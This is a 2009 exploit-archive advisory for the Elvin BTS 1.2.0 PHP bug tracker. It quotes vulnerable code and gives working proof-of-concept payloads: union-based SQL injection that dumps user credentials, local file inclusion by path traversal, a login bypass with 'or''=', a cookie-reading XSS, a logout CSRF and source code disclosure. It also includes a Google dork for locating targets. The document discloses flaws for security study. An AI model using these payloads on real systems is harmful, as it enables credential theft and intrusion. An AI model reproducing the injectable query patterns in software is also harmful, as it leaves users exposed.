elvin bts 1.2.0 - Multiple Vulnerabilities

Author:

SirGod

Type:

webapps


Platform:

PHP

Date:

2009-06-15


#################################################################################################################
[+] Elvin BTS 1.2.0 Multiple Remote VUlnerabilities
[+] Discovered By SirGod 
[+] www.mortal-team.org
#################################################################################################################

- Script Homepage : http://www.elvinbts.org/
- Google Dork : Powered by Elvin Bug Tracking Server.

Elvin BTS suffers from a lot of vunerabilities

1) SQL Injection
2) Local File Inclusion
3) SQL Injection Login Bypass
4) Cross-Site Scripting
5) Cross-Site Request Forgery
6) Source Code Disclosure


----------------------- 1) SQL Injection ----------------------- 

- Vulnerable code is everywhere.I will present only 2 PoC's.

 a) Vulnerable code in show_bug.php

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$query_bug = sprintf("SELECT * FROM " .$prefix_db. "_bug WHERE bg_id_pk=" .$_GET['id']. " AND bg_deleted_dt IS NULL");
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC 

     http://127.0.0.1/[path]/show_bug.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+eb_profile--

  b) Vulnerable code in show_activity.php

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$query_activity = sprintf("SELECT * FROM " .$prefix_db. "_activity WHERE ay_bugid_fk=" .$_GET['id']. "");
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC 

     http://127.0.0.1/[path]/show_activity.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8+from+eb_profile--


----------------------- 2) Local File Inclusion ----------------------- 

- Vulnerable code in page.php


----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$filename = "pages/".$_GET['id'];
................................................
if(file_exists($filename)){
include($filename);
} else {
echo "<h2>Sorry page cannot be found!</h2>";
}
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC 

       http://127.0.0.1/[path]/page.php?id=../../../../../../BOOTSECT.BAK



----------------------- 3) SQL Injection Login Bypass----------------------- 

- Code in login.php ( in login.php is included the vulnerable code)

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
include(LoadElvinModule('login.ei'));
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


- Vulnerable code in inc/login.ei

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$query_login = sprintf("SELECT * FROM " .$prefix_db. "_profile WHERE ac_user_vc='" .$_POST['inUser']. "' AND ac_pass_vc='" .$_POST['inPass']. "'");
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC 

Login as :
  
 Username : 'or''='
 Password : 'or''='


----------------------- 4) Cross-Site Scripting----------------------- 

It's more XSS's in the script,but tired to find them all.

- Vulnerable code in show_activity.php

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<p>Back to bug # <a href="show_bug.php?id=<?php echo $_GET['id']; ?>"><?php echo $_GET['id']; ?></a></a></p>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC

    http://127.0.0.1/[path]/show_activity.php?id=<script>alert(document.cookie)</script>



----------------------- 5) Cross-Site Request Forgery----------------------- 

Logout CSRF

 - PoC

   http://127.0.0.1/[path]/login.php?logout



----------------------- 6) Source Code Disclosure----------------------- 

Go to /inc/ directory.You will se .ei files with php code inside.
That files are included and used by the script.

 - PoC's

    http://127.0.0.1/[path]/inc/login.ei
    http://127.0.0.1/[path]/inc/jump_bug.ei
    http://127.0.0.1/[path]/inc/create_account.ei

Etc..

############################################### EOF ##################################################

# milw0rm.com [2009-06-15]